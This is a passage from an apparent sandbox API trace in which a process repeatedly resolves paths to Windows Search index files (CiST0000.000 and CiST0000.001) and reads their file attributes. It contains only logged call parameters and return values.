nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.596] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.596] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.596] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.596] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.596] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.596] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.596] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.596] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.596] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.596] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.596] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.597] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.597] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.597] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.597] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.597] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.597] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.597] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.597] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.597] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.597] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.000"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x42291130, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0)) returned 1 [0252.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.598] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.598] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.000"), fInfoLevelId=0x0, lpFileInformation=0x700347c | out: lpFileInformation=0x700347c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x42291130, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0)) returned 1 [0252.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.598] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.598] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.598] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.598] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.000"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x42291130, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0)) returned 1 [0252.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.599] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.603] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.603] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.603] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.603] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.603] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.603] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.603] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.604] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.604] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.604] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.604] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.604] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.604] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.604] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.604] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.604] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.604] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.604] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.604] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.604] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.604] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.604] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.604] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.605] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.605] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.605] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.605] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.605] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.605] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.605] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.001"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x420c80b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0252.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.605] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.001"), fInfoLevelId=0x0, lpFileInformation=0x7007330 | out: lpFileInformation=0x7007330*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x420c80b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0252.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.605] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.605] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.606] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.001"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x420c80b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0252.606] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.606] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001", lpFilePart=0x0) returned 0x68 [0252.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.607] GetFileAttributesExW (in: lpFileName="C:\\Users\\All 